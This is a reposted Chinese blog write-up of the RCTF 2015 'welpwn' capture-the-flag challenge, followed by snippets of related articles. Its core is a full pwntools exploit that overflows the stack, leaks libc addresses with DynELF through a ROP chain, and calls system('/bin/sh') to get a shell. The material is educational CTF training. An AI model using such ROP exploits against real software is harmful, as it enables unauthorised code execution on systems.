RCTF 2015 welpwn [ROP] [x64通用gadgets] [简单写法]

最新推荐文章于 2022-09-04 21:33:18 发布
转载 最新推荐文章于 2022-09-04 21:33:18 发布 · 426 阅读 · 0

本文详细介绍了使用Python脚本进行welpwn漏洞利用的过程,包括ROP技术的应用、DynELF动态链接库解析及shellcode注入技巧。通过具体示例展示了如何构造payload,泄露内存地址并最终获取shell。

https://blog.youkuaiyun.com/u011987514/article/details/70232881

按照自己习惯,代码重写一下:

#!/usr/bin/env python
# coding=utf-8

from pwn import *

io = process("./welpwn")

#gadgets
p4r = 0x40089C
pr = 0x4008A3
main = 0x4007CD
puts = 0x4005A0
bss = 0x601070

io.recvuntil("RCTF\n")
def leak(addr):
    payload = "A" * 16 + "B" * 8
    rop = p64(pr) + p64(addr) + p64(puts) + p64(main)
    payload += p64(p4r) + rop
    io.sendline(payload)
    io.recv(27)
    tmp = io.recv()
    data = tmp.split("\nWelcome")[0]
    if len(data):
        return data
    else:
        return "\x00"

d = DynELF(leak, elf = ELF("./welpwn"))
system = d.lookup("system", "libc")
log.info("system addr = " + hex(system))
gets = d.lookup("gets", "libc")
log.info("gets addr = " + hex(gets))

rop = p64(pr) + p64(bss) + p64(gets) + p64(pr) + p64(bss) + p64(system) + p64(0)
payload = "A" * 16 + "B" * 8 + p64(p4r) + rop
io.sendline(payload)
io.sendline("/bin/sh\x00")
io.interactive()

 

攻防世界-PWN进阶区-welpwn(RCTF-2015)
weixin_44145820的博客
02-27 1195
题目分析 首先看一下开了哪些保护 因为开了NX,所以考虑使用ROP或者return-into-libc 用IDApro分析一下源代码 可以看出main函数中不存在注入点,我们看一下echo函数 在eho函数中,缓冲区至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到...
深入探究64位rop链构造,wp中常见的万能gadgets详解| 攻防世界pwn进阶区welpwn
Kni9hT's Blog
03-20 2135
文章目录前言思路分析0x00.检查保护机制0x01.找到溢出点0x02.跳过echo在buf上构造rop0x03.选择合适的gadgets0x04.万能的通用gadgets利用过程使用DynELF使用LibcSearcher 前言 这一题做的时间跨度比较长了,断断续续做了一天多,然后尝试了两种方式,一种是DynELF泄露system地址,还有一种是利用python的LibcSearcher模块得到...
RCTF-2015——welpwn
05-11 394
64位程序 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char buf; // [rsp+0h] [rbp-400h] 4 5 write(1, "Welcome to RCTF\n", 0x10uLL); 6 fflush(_...
welpwnRCTF-2015--write up
ATFWUS的博客
03-12 1089
文件下载地址: 链接:https://pan.baidu.com/s/1MG2z9r4wz_WTEz1vIikqJQ 提取码:3tbc 0x01.分析 checksec: 源码分析: 流程非常简单,首先输入一个1024大小字符串,然后进入函数echo,这个函数会将buf的数据一个字节一个字节的复制到s2中,...
RCTF2015 welpwn: 200 writeup
fuchuangbob的专栏
06-14 2481
题目:http://oj.xctf.org.cn/files/welpwn_932a4428ea8d4581431502ab7e66ea4b最简单栈溢出,先read 1024字节,然后循环赋值导致栈溢出,循环到\0结束,因此需要构造ROP过掉\0限制: 0x0040089c: pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret ‘A’*24 + p64(0x
RCTF 2015 welpwn [ROP] [x64通用gadgets]
ACdream
01-26 872
先checksec一下: 漏洞点其实蛮好找的:程序里也没几个函数 main函数中read了一个字符串,然后当成参数传递给了echo函数 在echo中的函数的接收buffer长度仅仅为0x10,而且是一个一个字符赋值的,栈缓冲区溢出漏洞,0x10 + 0x8 = 0x18个填充 控制了ESP之后,程序开启了NX,一定想到的是ROP 这里的基础知识是: http:/...
【逆向学习记录】学习《一步一步学ROP_x64
卦星的专栏
01-12 1175
1.概述 通过前面几篇文章,基本上搞定了x86的漏洞原理,针对x64的还需要进一步学习,依然利用最经典的当属蒸米大神的一步一步教学系列 一步一步学ROP之linux_x64篇 – 蒸米 环境:ubuntu 16.04 2.linux x86与x64的区别 这里引用一下上面文章中的语言: linux_64与linux_86的区别主要有两点: 1.首先是内存地址的范围由32位变成了64位。但是可以使用...
ROP链与ROP Gadgets的实战
# 1. ROP攻击简介 **1.1 ROP攻击的定义** ... 在程序执行时,栈上的返回地址被攻击者篡改为指向程序已有的代码片段(Gadgets),这些Gadgets连起来形成了一个ROP链,从而完成攻击者预定的恶意操作。 **1.3 ROP攻击
精选资源
ROPgadget:使用此工具,您可以在二进制文件中搜索小工具,以方便您对ROP的利用。 ROPgadget在x86,x64,ARM,ARM64,PowerPC,SPARC和MIPS架构上支持ELF,PE和Mach-O格式
05-02
ROPgadget在x86,x64,ARM,ARM64,PowerPC,SPARC和MIPS体系结构上支持ELF / PE / Mach-O格式。 从版本5开始,ROPgadget具有一个新的内核,该内核是使用Capstone拆卸框架针对小工具搜索引擎用Python编写的-较旧的...
PWN入门之通用gadgets
weixin_44681716的博客
04-09 3251
实验目的 针对一些程序运行时的初始化函数(如加载libc.so的初始化函数),提取一些通用gadgets,从而更利于我们继续ROP操作。 实验文件 这次实验的可执行文件文件通过我们自己编译一个程序产生,为了降低实验的难度,我们在进行编译的时候,关闭栈保护和数据执行保护(DEP)。 ...
welpwn pwn 入门题
02-11
pwn 入门题
菜鸟做题记--------welpwnRCTF2015
Return的博客
02-12 712
1.看下保护发现只打开了NX。 [*] 'home/ctf/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 2.拖入IDA看下结果 int __cdecl main(int argc, const char **argv, const char **e
RCTF Welpwn
weixin_30871293的博客
01-12 180
Welpwn 很久以前的了,现在整理一下 题目的漏洞很明显,就是一个栈溢出。程序打开了NX,却没有给libc。重点是,在向栈上拷贝数据时,如果输入中含有'\x00',会被截断,对利用漏洞造成了困难。虽说被'\x00'截断但是还是能将返回地址覆盖。 以前曾见到一篇名为return to dl_resolve的文章,副标题是ret2lib without information leak,感觉很...
welpwnctf题目
shanwei274的博客
04-06 334
记录一道自己做的ctf题目:welpwnRCTF-2015 1.老生常谈checksec查看: 可以看到只开了nx保护,下面我们进入ida下面看看。 发现是一个想rbp-400,rsp+0h的地方read进入恰好0x400的数据,然后调用了echo函数,我们进入echo看看。 发现了一个简化版的strcpy函数,第一反应溢出溢出!但是这里由于在复制过程中遇到’0x00‘会被截断,所以64位下我们打包的p64(pop_rdi)+p64(binsh_addr)+p64(system)可能复制不到一半就
Pwn 学习 question_5 x64ROP编程
MrTreebook的博客
04-30 681
Pwn 学习 question_5 x64ROP编程1.源代码2.编译x86x643.x863.1.确定溢出量3.2.布栈3.2.1.第一次溢出3.2.2.计算libc_base3.2.3.第二次溢出3.3.exp4.x644.1.确定溢出量4.2.布栈4.2.1.第一次布栈4.2.2.计算偏移4.2.3.第二次布栈4.3.exp 1.源代码 #include<stdio.h> #include<stdlib.h> #include<unistd.h> int dofun
XCTF WEB upload(RCTF-2015)
A_dmin的博客
12-12 1100
XCTF WEB upload(RCTF-2015) 两百多天未解决的问题了,,,, 打开题目,发现需要登录注册,,注册登陆之后需要我们进行文件上传: 估摸着登录页面与注册页面没有漏洞,,,,,毕竟题目提示就是让我们上传,, 上传的套路都试过,只能上传jpg图片,,,,其他一律不行,,,而且不知道路径为多少,,, jpg图片上传成功之后有个提示: 奇怪的uid,,,,,数据库编号之类的,,,...
【How2Pwn】DreamHack x64下的ROP问题
Jeongon的博客
09-04 1030
Pwn中的ROP问题演示
rois welpwn -xman
u014281987的博客
08-28 889
echo 函数有栈溢出,把之前read的字符串复制到栈里,可素64位rop指令有00,所以根据echo函数逻辑,一个pop之类的后面的ret就覆盖不了,rop到此为止。不过看看main,木有截断哦,所以ppppr = 0x40089c这个就是为了把之前main栈里的24个a和一个pppr弹出来,接着不就可以之后写个ret,继续构造rop了吗!所以利用上一个栈桢是很有用滴,比如robot那个构造递归
XCTF攻防世界题目upload(RCTF-2015)
daqiangdetianxia的博客
08-12 820
upload 信息搜集 dirsearch目录扫描,发现classes目录 然后进入classes目录,发现password.php user.php文件夹 中间件和服务器:Apache/2.4.7 (Ubuntu) 尝试 用sqlmap对登录和注册页面进行注入,发现不行。 注册后进行登录,发现有一个文件上传页面。可能是一个文件上传漏洞。 上传一句话木马,找不到上传后的文件夹,于是通过猜测上传文件夹名称,找不到,于是放弃文件上传漏洞。 文件上传后发现 ...
OptiROP:探索与实战ROP gadgets神器
"Nguyen在SyScan360 2013会议上分享了关于OptiROP,一个用于搜寻Return-Oriented Programming (ROP) gadgets的工具,以及它如何对抗数据执行保护(DEP)策略。" 在信息安全领域,Return-Oriented Programming (ROP)...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值